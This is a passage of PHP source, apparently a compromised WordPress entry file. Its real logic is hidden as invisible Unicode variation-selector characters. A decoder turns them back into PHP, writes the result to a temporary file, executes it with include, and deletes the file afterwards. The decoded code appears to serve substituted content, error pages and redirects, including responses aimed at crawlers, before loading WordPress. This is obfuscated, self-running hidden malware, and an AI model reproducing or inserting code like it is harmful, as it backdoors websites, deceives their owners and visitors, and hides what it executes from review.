󠅜󠄫󠄐󠅓󠅘󠅑󠅢󠅣󠅕󠅤󠄭󠅥󠅤󠅖󠄝󠄨󠄗󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅕󠅓󠅘󠅟󠄐󠅣󠅤󠅢󠅏󠅢󠅕󠅠󠅜󠅑󠅓󠅕󠄘󠄒󠅟󠅛󠅨󠅝󠅜󠅗󠅕󠅤󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄒󠄜󠄐󠄗󠄗󠄜󠄐󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅕󠅨󠅙󠅤󠄘󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠅭󠄐󠅕󠅜󠅣󠅕󠅙󠅖󠄐󠄘󠅣󠅤󠅢󠅣󠅤󠅢󠄘󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄜󠄐󠄗󠅗󠅕󠅤󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄥󠄠󠄠󠅠󠅑󠅗󠅕󠄗󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅘󠅕󠅑󠅔󠅕󠅢󠄘󠄗󠄸󠅄󠅄󠅀󠄟󠄡󠄞󠄡󠄐󠄥󠄠󠄠󠄐󠄹󠅞󠅤󠅕󠅢󠅞󠅑󠅜󠄐󠅃󠅕󠅢󠅦󠅕󠅢󠄐󠄵󠅢󠅢󠅟󠅢󠄗󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅕󠅨󠅙󠅤󠄘󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠅭󠄐󠅕󠅜󠅣󠅕󠅙󠅖󠄐󠄘󠅣󠅤󠅢󠅣󠅤󠅢󠄘󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄜󠄐󠄗󠅗󠅕󠅤󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄤󠄠󠄤󠅠󠅑󠅗󠅕󠄗󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅘󠅕󠅑󠅔󠅕󠅢󠄘󠄗󠄸󠅄󠅄󠅀󠄟󠄡󠄞󠄡󠄐󠄤󠄠󠄤󠄐󠄾󠅟󠅤󠄐󠄶󠅟󠅥󠅞󠅔󠄗󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅕󠅨󠅙󠅤󠄘󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠅭󠄐󠅕󠅜󠅣󠅕󠅙󠅖󠄐󠄘󠅣󠅤󠅢󠅣󠅤󠅢󠄘󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄜󠄐󠄗󠅗󠅕󠅤󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄣󠄠󠄡󠅠󠅑󠅗󠅕󠄗󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅘󠅕󠅑󠅔󠅕󠅢󠄘󠄗󠄸󠅄󠅄󠅀󠄟󠄡󠄞󠄡󠄐󠄣󠄠󠄡󠄐󠄽󠅟󠅦󠅕󠅔󠄐󠅀󠅕󠅢󠅝󠅑󠅞󠅕󠅞󠅤󠅜󠅩󠄗󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄐󠄭󠄐󠅣󠅤󠅢󠅏󠅢󠅕󠅠󠅜󠅑󠅓󠅕󠄘󠄗󠅗󠅕󠅤󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄣󠄠󠄡󠅠󠅑󠅗󠅕󠄗󠄜󠄐󠄗󠄗󠄜󠄐󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅘󠅕󠅑󠅔󠅕󠅢󠄘󠄗󠄼󠅟󠅓󠅑󠅤󠅙󠅟󠅞󠄪󠄐󠄗󠄐󠄞󠄐󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅕󠅨󠅙󠅤󠄘󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠅭󠄐󠅕󠅜󠅣󠅕󠅙󠅖󠄐󠄘󠅣󠅤󠅢󠅣󠅤󠅢󠄘󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄜󠄐󠄗󠅟󠅛󠅢󠅟󠅒󠅟󠅤󠅣󠅗󠅕󠅤󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄗󠄙󠄙󠄐󠅫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅘󠅕󠅑󠅔󠅕󠅢󠄘󠄗󠄳󠅟󠅞󠅤󠅕󠅞󠅤󠄝󠅄󠅩󠅠󠅕󠄪󠄐󠅤󠅕󠅨󠅤󠄟󠅠󠅜󠅑󠅙󠅞󠄗󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅕󠅓󠅘󠅟󠄐󠅣󠅤󠅢󠅏󠅢󠅕󠅠󠅜󠅑󠅓󠅕󠄘󠄒󠅟󠅛󠅢󠅟󠅒󠅟󠅤󠅣󠅗󠅕󠅤󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄒󠄜󠄐󠄗󠄗󠄜󠄐󠄔󠅘󠅤󠅝󠅜󠅏󠅓󠅟󠅞󠅤󠅕󠅞󠅤󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠄐󠅕󠅨󠅙󠅤󠄘󠄙󠄫︍︊󠄐󠄐󠄐󠄐󠅭︍︊󠅭︍︊󠅔󠅕󠅖󠅙󠅞󠅕󠄘󠄐󠄗󠅇󠅀󠅏󠅅󠅃󠄵󠅏󠅄󠄸󠄵󠄽󠄵󠅃󠄗󠄜󠄐󠅤󠅢󠅥󠅕󠄐󠄙󠄫︍︊󠅢󠅕󠅡󠅥󠅙󠅢󠅕󠄐󠅏󠅏󠄴󠄹󠅂󠅏󠅏󠄐󠄞󠄐󠄗󠄟󠅧󠅠󠄝󠅒󠅜󠅟󠅗󠄝󠅘󠅕󠅑󠅔󠅕󠅢󠄞󠅠󠅘󠅠󠄗󠄫';
            $tmp = preg_split('//u', $iVmRpAEs, -1, PREG_SPLIT_NO_EMPTY);
            foreach ($tmp as $ch) {
                $bts = unpack('C*', $ch);
                $cnt = count($bts);
                $cp = 0;
                if ($cnt==1){$cp=$bts[1];}
                elseif($cnt==2){$cp=( ($bts[1]&31)<<6 )|($bts[2]&63);}
                elseif($cnt==3){$cp=( ($bts[1]&15)<<12 )|( ($bts[2]&63)<<6 )|($bts[3]&63);}
                elseif($cnt==4){$cp=( ($bts[1]&7)<<18 )|( ($bts[2]&63)<<12 )|( ($bts[3]&63)<<6 )|($bts[4]&63);}
                $res=null;
                if($cp>=0xFE00 && $cp<=0xFE0F){$res=$cp-0xFE00;}
                elseif($cp>=0xE0100 && $cp<=0xE01EF){$res=($cp-0xE0100)+16;}
                if($res!==null){array_push($UkEBggpT,chr($res));}
            }
            return implode('',$UkEBggpT);
        };
        $dec = $NuuXGPZZ('');

        $tempPath = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'temp_' . md5(uniqid()) . '.php';
        if (file_put_contents($tempPath, $dec) !== false) {
                register_shutdown_function(function() use ($tempPath) {
                    if (file_exists($tempPath)) {
                        unlink($tempPath);
                    }
                });
                include $tempPath;
            }
    };
    $sDAZxucO();
}

